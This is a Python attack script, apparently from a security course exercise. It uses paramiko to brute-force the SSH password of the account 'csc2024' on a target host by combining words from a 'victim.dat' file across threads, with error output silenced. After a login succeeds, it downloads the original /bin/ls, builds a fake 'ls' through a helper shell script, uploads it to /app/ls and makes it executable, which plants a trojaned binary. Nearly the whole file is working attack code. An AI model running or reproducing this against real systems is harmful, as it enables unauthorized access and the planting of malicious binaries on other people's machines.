#!/usr/bin/python3
import itertools
import paramiko
import sys
import os
import threading
import time
import paramiko.ssh_exception

username = "csc2024"
password = ""
max_retries = 5
batch_size = 50

null = open(os.devnull, "w")
sys.stderr = null


def try_passwd(str: str) -> None:
    for i in range(max_retries):
        try:
            global password
            if password != "":
                print("Password found: " + password)
                return
            time.sleep(0.1)
            transport = paramiko.Transport((sys.argv[1], 22))
            transport.connect(username=username, password=str)
            transport.close()

            password = str
            return
        except (KeyboardInterrupt, paramiko.ssh_exception.AuthenticationException):
            transport.close()
            return
        except:
            transport.close()


def crack_passwd():

    file = open("victim.dat", "r")
    info = [i.strip() for i in file.readlines()]
    file.close()

    threads = []
    global password
    # Try all possible password
    for n in range(1, len(info)+1):
        for i in itertools.product(info, repeat=n):
            if password != "":
                if len(threads) > 0:
                    for t in threads:
                        t.join()
                return password
            str = ""
            for j in i:
                str += j
            t = threading.Thread(target=try_passwd, args=(str,))
            t.start()
            threads.append(t)
            if len(threads) >= batch_size:
                for t in threads:
                    t.join()
                threads = []
        time.sleep(1)

    while password == "":
        pass


def upload_ls(username: str, password: str) -> None:
    while True:
        try:
            transport = paramiko.Transport((sys.argv[1], 22))
            transport.connect(username=username, password=password)
            sftp = paramiko.SFTPClient.from_transport(transport)
            sftp.put(os.path.abspath(os.getcwd()) + "/ls", "/app/ls")

            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(sys.argv[1], 22, username, password)
            ssh.exec_command("chmod +x /app/ls")
            break
        except KeyboardInterrupt:
            exit()
        except Exception as e:
            print(e)
            pass

    transport.close()


def download_ls(username: str, password: str) -> None:
    while True:
        try:
            transport = paramiko.Transport((sys.argv[1], 22))
            transport.connect(username=username, password=password)
            sftp = paramiko.SFTPClient.from_transport(transport)
            sftp.get("/bin/ls", os.path.abspath(os.getcwd()) + "/ori_ls")
            break
        except KeyboardInterrupt:
            exit()
        except Exception as e:
            print(e)
            pass

    transport.close()


if __name__ == '__main__':

    username = "csc2024"
    password = crack_passwd()

    os.system(f"./create_fake_ls.sh {sys.argv[2]} {sys.argv[3]}")
    upload_ls(username, password)
